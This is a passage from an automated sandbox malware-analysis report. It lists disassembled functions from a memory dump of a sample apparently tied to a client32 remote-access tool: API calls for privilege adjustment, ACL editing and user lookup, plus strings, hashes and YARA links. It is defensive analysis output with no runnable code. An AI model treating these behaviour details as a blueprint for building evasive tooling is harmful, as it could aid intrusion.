                                                                                                                        • Opcode Fuzzy Hash: 165dbe231f117ebd44f1d6efac5f36e132283eab700a07012f2c61a5b2eff8d7
                                                                                                                        • Instruction Fuzzy Hash: B2C1FBB0D106299BDB328F14CC85BAEBBB8FB54B11F4085DAE159A7280D7B09F84CF55
                                                                                                                        Function 00B32140 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 238memorylibraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B31540: LookupAccountNameW.ADVAPI32(00000000,?,00B3252C,?,?,?,?), ref: 00B3158E
                                                                                                                          • Part of subcall function 00B31540: GetLastError.KERNEL32 ref: 00B31598
                                                                                                                        • GetProcAddress.KERNEL32(?,GetNamedSecurityInfoW), ref: 00B32247
                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B322B7
                                                                                                                        • GetLastError.KERNEL32 ref: 00B322C1
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00B322E4
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00B322F6
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00B3230A
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00B32311
                                                                                                                        • InitializeAcl.ADVAPI32(00000000,?,00000002), ref: 00B3231D
                                                                                                                        • GetLastError.KERNEL32 ref: 00B32327
                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00B32369
                                                                                                                        • AddAce.ADVAPI32(00000000,00000002,000000FF,00000000,?), ref: 00B32393
                                                                                                                        • AddAuditAccessAce.ADVAPI32(00000000,00000002,?,?,?,?), ref: 00B323B8
                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,?,?,?,?,00000002,000000FF,00000000,?), ref: 00B323C2
                                                                                                                          • Part of subcall function 00B3A205: _malloc.LIBCMT ref: 00B3A213
                                                                                                                        • LocalFree.KERNEL32(?,?,?,00000001), ref: 00B32435
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000001), ref: 00B32442
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00B32449
                                                                                                                          • Part of subcall function 00B315D0: GetCurrentProcess.KERNEL32(00000028,?), ref: 00B31600
                                                                                                                          • Part of subcall function 00B315D0: OpenProcessToken.ADVAPI32(00000000), ref: 00B31607
                                                                                                                          • Part of subcall function 00B315D0: LookupPrivilegeValueW.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00B3161B
                                                                                                                          • Part of subcall function 00B315D0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00B31647
                                                                                                                          • Part of subcall function 00B315D0: GetLastError.KERNEL32 ref: 00B31651
                                                                                                                          • Part of subcall function 00B315D0: CloseHandle.KERNEL32(?), ref: 00B3165D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$HeapProcess$FreeLengthLookupToken$AccessAccountAddressAdjustAllocAuditCloseCurrentHandleInformationInitializeLocalNameOpenPrivilegePrivilegesProcValue_malloc
                                                                                                                        • String ID: GetNamedSecurityInfoW$SetNamedSecurityInfoW$W
                                                                                                                        • API String ID: 2017016695-1988343955
                                                                                                                        • Opcode ID: 30a8a26d26bc2196c227342a828eae1e0b1b05d9758b9f038f8da6200c73109c
                                                                                                                        • Instruction ID: 28b1decce06ea1fae1eb880b5b7e0ae16367fd4032453f9ae725d5543a980115
                                                                                                                        • Opcode Fuzzy Hash: 30a8a26d26bc2196c227342a828eae1e0b1b05d9758b9f038f8da6200c73109c
                                                                                                                        • Instruction Fuzzy Hash: 699144B1A002199FDB24DF64DD45BDAB7F8EF54701F1041D9EA49A7280EBB49E80CF91
                                                                                                                        Function 00AFEDF0 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 85libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(setupapi,00B2CD69), ref: 00AFEDF5
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiDestroyDeviceInfoList), ref: 00AFEE22
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceRegistryPropertyW), ref: 00AFEE34
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInfo), ref: 00AFEE47
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsW), ref: 00AFEE5A
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiDeleteDeviceInfo), ref: 00AFEE6C
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiCallClassInstaller), ref: 00AFEE7F
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiSetDeviceRegistryPropertyW), ref: 00AFEE92
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiCreateDeviceInfoW), ref: 00AFEEA4
                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetupDiCreateDeviceInfoList), ref: 00AFEEB7
                                                                                                                          • Part of subcall function 00B2F5E0: LoadStringW.USER32(00AE0000,000003F9,?,00000100), ref: 00B2F60A
                                                                                                                          • Part of subcall function 00B2F5E0: wvsprintfW.USER32(?,?,00000000), ref: 00B2F622
                                                                                                                        Strings
                                                                                                                        • SetupDiCreateDeviceInfoW, xrefs: 00AFEE9E
                                                                                                                        • SetupDiEnumDeviceInfo, xrefs: 00AFEE3C
                                                                                                                        • SetupDiGetDeviceRegistryPropertyW, xrefs: 00AFEE2E
                                                                                                                        • SetupDiCallClassInstaller, xrefs: 00AFEE74
                                                                                                                        • SetupDiGetClassDevsW, xrefs: 00AFEE4F
                                                                                                                        • SetupDiCreateDeviceInfoList, xrefs: 00AFEEAC
                                                                                                                        • SetupDiDeleteDeviceInfo, xrefs: 00AFEE66
                                                                                                                        • SetupDiSetDeviceRegistryPropertyW, xrefs: 00AFEE87
                                                                                                                        • setupapi, xrefs: 00AFEDF0
                                                                                                                        • SetupDiDestroyDeviceInfoList, xrefs: 00AFEE1C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$Load$LibraryStringwvsprintf
                                                                                                                        • String ID: SetupDiCallClassInstaller$SetupDiCreateDeviceInfoList$SetupDiCreateDeviceInfoW$SetupDiDeleteDeviceInfo$SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInfo$SetupDiGetClassDevsW$SetupDiGetDeviceRegistryPropertyW$SetupDiSetDeviceRegistryPropertyW$setupapi
                                                                                                                        • API String ID: 3735228727-3886225236
                                                                                                                        • Opcode ID: d75f0ab7219a47b5458a4befd6dc81aed9e1ffdcb4045cfc2c04fcab8076581e
                                                                                                                        • Instruction ID: 725ce8e28dd7143ae3e2747da2d358b1a6d3ac1fcc47d1e11ae1e037c4f2dc92
                                                                                                                        • Opcode Fuzzy Hash: d75f0ab7219a47b5458a4befd6dc81aed9e1ffdcb4045cfc2c04fcab8076581e
                                                                                                                        • Instruction Fuzzy Hash: A331E8B0E10219AEDB10DFB8AD49F66BAE8BB18705F00556BB204972B1FFB85844CF55
                                                                                                                        Function 00B082C0 Relevance: 34.9, APIs: 23, Instructions: 364COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00B082EE
                                                                                                                          • Part of subcall function 00B06BB0: GetDC.USER32(00000000), ref: 00B06BB7
                                                                                                                        • GetSysColor.USER32(00000010), ref: 00B0831C
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00B0835D
                                                                                                                        • GlobalLock.KERNEL32(?), ref: 00B0836D
                                                                                                                        • GlobalLock.KERNEL32(?), ref: 00B08376
                                                                                                                        • GlobalUnlock.KERNEL32(?), ref: 00B08431
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00B0843A
                                                                                                                        • GlobalUnlock.KERNEL32(?), ref: 00B08440
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00B08446
                                                                                                                          • Part of subcall function 00B12410: GetObjectW.GDI32(?,00000018,?), ref: 00B12423
                                                                                                                          • Part of subcall function 00B12410: CreateCompatibleDC.GDI32(00000000), ref: 00B12431
                                                                                                                          • Part of subcall function 00B12410: CreateCompatibleDC.GDI32(00000000), ref: 00B12436
                                                                                                                          • Part of subcall function 00B12410: SelectObject.GDI32(00000000,00000000), ref: 00B1244E
                                                                                                                          • Part of subcall function 00B12410: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00B12461
                                                                                                                          • Part of subcall function 00B12410: SelectObject.GDI32(00000000,00000000), ref: 00B1246C
                                                                                                                          • Part of subcall function 00B12410: SetBkColor.GDI32(00000000,00000000), ref: 00B12476
                                                                                                                          • Part of subcall function 00B12410: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00B12493
                                                                                                                          • Part of subcall function 00B12410: SetBkColor.GDI32(00000000,00000000), ref: 00B1249C
                                                                                                                          • Part of subcall function 00B12410: SetTextColor.GDI32(00000000,00FFFFFF), ref: 00B124A8
                                                                                                                          • Part of subcall function 00B12410: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 00B124C5
                                                                                                                          • Part of subcall function 00B12410: SetBkColor.GDI32(00000000,00B0700B), ref: 00B124D0
                                                                                                                          • Part of subcall function 00B12410: SetTextColor.GDI32(00000000,00000000), ref: 00B124D9
                                                                                                                          • Part of subcall function 00B12410: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 00B124F6
                                                                                                                          • Part of subcall function 00B12410: SelectObject.GDI32(00000000,00000000), ref: 00B12501
                                                                                                                        • DeleteObject.GDI32(?), ref: 00B08467
                                                                                                                        • _memmove.LIBCMT ref: 00B084AB
                                                                                                                        • _memset.LIBCMT ref: 00B084B5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$ColorGlobal$CreateSelect$CompatibleDeleteFreeLockTextUnlock$Bitmap_memmove_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1775889417-0
                                                                                                                        • Opcode ID: 6a9acde3b181852fbfcb1347249f147b6e3b7e217fa1ac31681750a808415057
                                                                                                                        • Instruction ID: 6ff35363ed89b4ebc16df07eb812967258e0d68e1bcc1d49691a7cfd456573b7
                                                                                                                        • Opcode Fuzzy Hash: 6a9acde3b181852fbfcb1347249f147b6e3b7e217fa1ac31681750a808415057
                                                                                                                        • Instruction Fuzzy Hash: 85E19D71D04259AFCF14CFA8D8809EEBFF5EF59300F158199E894A7381DB35AA01CBA0
                                                                                                                        Function 00B0E8E0 Relevance: 33.5, APIs: 5, Strings: 14, Instructions: 291COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B39583: __wfsopen.LIBCMT ref: 00B39590
                                                                                                                        • wsprintfW.USER32 ref: 00B0EA34
                                                                                                                        • _wcschr.LIBCMT ref: 00B0EAC1
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00B0E941
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$CurrentDirectoryLocalTime__wfsopen_malloc_wcschrwvsprintf
                                                                                                                        • String ID: %s\%s$Update [%s]%s=%s, format=%d$can't open client32.upd$client32.ini$client32.ini %s$client32.upd$client32u.ini$client32u.ini %s$doesn't exist$error %d opening %s - update failed$exists$update error$update error - wrong file format?$updating from client32.upd, cwd=%s
                                                                                                                        • API String ID: 759745667-2256608672
                                                                                                                        • Opcode ID: def6e3d62edc7093e8f0e01b6369635d06ad34e042b97bad6222a4cda6a9f242
                                                                                                                        • Instruction ID: 9a10764b20658ab0e373617477fb6bb6741bfaa9c9f1b7ab728a551211594b97
                                                                                                                        • Opcode Fuzzy Hash: def6e3d62edc7093e8f0e01b6369635d06ad34e042b97bad6222a4cda6a9f242
                                                                                                                        • Instruction Fuzzy Hash: 1EA1F771A003159ADF20AB649C82BFA76F4EF44745F0408E8F81BAB2D2EA74DA44C795
                                                                                                                        Function 00B08C70 Relevance: 31.8, APIs: 21, Instructions: 301COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B06BB0: GetDC.USER32(00000000), ref: 00B06BB7
                                                                                                                          • Part of subcall function 00B060C0: GetObjectW.GDI32(?,00000018,?), ref: 00B060DE
                                                                                                                          • Part of subcall function 00B060C0: GetStockObject.GDI32(0000000F), ref: 00B060F2
                                                                                                                          • Part of subcall function 00B060C0: GetDC.USER32(00000000), ref: 00B06174
                                                                                                                          • Part of subcall function 00B060C0: SelectPalette.GDI32(00000000,?,00000000), ref: 00B06185
                                                                                                                          • Part of subcall function 00B060C0: RealizePalette.GDI32(00000000), ref: 00B0618B
                                                                                                                          • Part of subcall function 00B060C0: GlobalAlloc.KERNEL32(00000042,?), ref: 00B061A6
                                                                                                                          • Part of subcall function 00B060C0: SelectPalette.GDI32(00000000,?,00000001), ref: 00B061BA
                                                                                                                          • Part of subcall function 00B060C0: RealizePalette.GDI32(00000000), ref: 00B061BD
                                                                                                                          • Part of subcall function 00B060C0: ReleaseDC.USER32(00000000,00000000), ref: 00B061C5
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00B08CC7
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00B08CF3
                                                                                                                        • GlobalLock.KERNEL32(?), ref: 00B08D0B
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00B08D11
                                                                                                                        • _memmove.LIBCMT ref: 00B08DD2
                                                                                                                        • _memmove.LIBCMT ref: 00B08ED0
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00B08EF0
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00B08EF7
                                                                                                                        • GlobalUnlock.KERNEL32(?), ref: 00B08F05
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00B08F0C
                                                                                                                        • DeleteObject.GDI32(?), ref: 00B08F17
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00B08F2E
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00B08F37
                                                                                                                        • GlobalUnlock.KERNEL32(?), ref: 00B08F3D
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00B08F43
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00B08F63
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00B08F7D
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00B08F80
                                                                                                                        • GlobalUnlock.KERNEL32(?), ref: 00B08F8E
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 00B08F91
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00B08F9C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Object$FreeUnlock$Palette$Delete$LockRealizeSelect_memmove$AllocReleaseStock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2129571978-0
                                                                                                                        • Opcode ID: 4c721eb33ab8055c21664ff3f3adc5dc3fdc9cee8383fb4b3e651987b1975ef0
                                                                                                                        • Instruction ID: f36e3b31fb2e9824aa5cc9f29b4b88d8e152171ea4c8b12cb61a2afa51001617
                                                                                                                        • Opcode Fuzzy Hash: 4c721eb33ab8055c21664ff3f3adc5dc3fdc9cee8383fb4b3e651987b1975ef0
                                                                                                                        • Instruction Fuzzy Hash: 2FB15075E0024A9FCB11DFB9D8819EEBFF5FF59310B148599E844A7391DB34AA01CBA0
                                                                                                                        Function 00B1C9D0 Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 220libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(netapi32.dll), ref: 00B1CA05
                                                                                                                        • GetProcAddress.KERNEL32(00000000,NetWkstaUserGetInfo), ref: 00B1CA36
                                                                                                                        • GetProcAddress.KERNEL32(00000000,NetUserGetInfo), ref: 00B1CA44
                                                                                                                        • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 00B1CA52
                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00B1CAA3
                                                                                                                        • GetTickCount.KERNEL32 ref: 00B1CB10
                                                                                                                        • GetTickCount.KERNEL32 ref: 00B1CB33
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressProc$CountTick$LibraryLoadNameUser
                                                                                                                        • String ID: <not Available>$AccessDenied$InvalidComputer$NetApiBufferFree$NetUserGetInfo$NetUserGetInfo(%ls\%ls) took %d ms and ret x%x$NetWkstaUserGetInfo$UserNotFound$d$netapi32.dll
                                                                                                                        • API String ID: 132346978-2450594007
                                                                                                                        • Opcode ID: 5b44823257e6d6363d79b64acd2378af06074948e43f80ff78e8b95b7f9385a7
                                                                                                                        • Instruction ID: 6945ed3b59c49338ab1da89d90a1c6a66117e29d5c445275a79cc26fb00d049c
                                                                                                                        • Opcode Fuzzy Hash: 5b44823257e6d6363d79b64acd2378af06074948e43f80ff78e8b95b7f9385a7
                                                                                                                        • Instruction Fuzzy Hash: AC812972A412289FDB20DB68CC95BEAB7B4EF89310F4041D5E94EA7251EB745E80CFD1
                                                                                                                        Function 00AEAD70 Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 192COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32 ref: 00AEADB9
                                                                                                                          • Part of subcall function 00AE9BE0: wvsprintfW.USER32(?,?,?), ref: 00AE9C0B
                                                                                                                        • __wcsnicmp.LIBCMT ref: 00AEAE57
                                                                                                                        • __wcsnicmp.LIBCMT ref: 00AEAE71
                                                                                                                        • __wcsnicmp.LIBCMT ref: 00AEAE8B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __wcsnicmp$ErrorLastwvsprintf
                                                                                                                        • String ID: DeviceID %d=%s$HDAUDIO\$OK.$PCI\$SetupDiCallClassInstaller failed, e=x%x$SetupDiCallClassInstaller...$SetupDiEnumDeviceInfo failed, e=x%x$SetupDiGetClassDevs failed, e=x%x$SetupDiSetClassInstallParams failed, e=x%x$USB\
                                                                                                                        • API String ID: 3833528386-3105874866
                                                                                                                        • Opcode ID: 6b78bf9647b97f87fdf8a6d2a0fd73cbff98ff06cf89ff4b42135b40f1ef7352
                                                                                                                        • Instruction ID: 11c85dceb0979ace961b837821af7f0a54aa4fcea4145ebaed4f568c361efaa4
                                                                                                                        • Opcode Fuzzy Hash: 6b78bf9647b97f87fdf8a6d2a0fd73cbff98ff06cf89ff4b42135b40f1ef7352
                                                                                                                        • Instruction Fuzzy Hash: BB6184F1904219AEEF10AB61DD89FFA77BCEB54701F0041D9B509A3191DBB4AE44CF62
                                                                                                                        Function 00B12410 Relevance: 30.1, APIs: 20, Instructions: 121windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00B12423
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B12431
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00B12436
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B1244E
                                                                                                                        • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00B12461
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B1246C
                                                                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 00B12476
                                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00B12493
                                                                                                                        • SetBkColor.GDI32(00000000,00000000), ref: 00B1249C
                                                                                                                        • SetTextColor.GDI32(00000000,00FFFFFF), ref: 00B124A8
                                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 00B124C5
                                                                                                                        • SetBkColor.GDI32(00000000,00B0700B), ref: 00B124D0
                                                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 00B124D9
                                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 00B124F6
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00B12501
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B12508
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00B12511
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00B12514
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00B12520
                                                                                                                        • DeleteObject.GDI32(?), ref: 00B12526
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$Color$DeleteSelect$Create$CompatibleText$Bitmap
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 294456051-0
                                                                                                                        • Opcode ID: e339c487493a753e5a5730bb74eca8b94db3f41f361fb6d3d44c721df1edc373
                                                                                                                        • Instruction ID: df9fe927f885b98ca8ce3e5288aa9d59ea19d4509af716a3a401794003783157
                                                                                                                        • Opcode Fuzzy Hash: e339c487493a753e5a5730bb74eca8b94db3f41f361fb6d3d44c721df1edc373
                                                                                                                        • Instruction Fuzzy Hash: 9A310275640218BBDB109B95DC89FEF77BCEF4D710F204145FA04B72D0DAB4A9018B65
                                                                                                                        Function 00AFF017 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 163fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00AFF0CD
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00AFF145
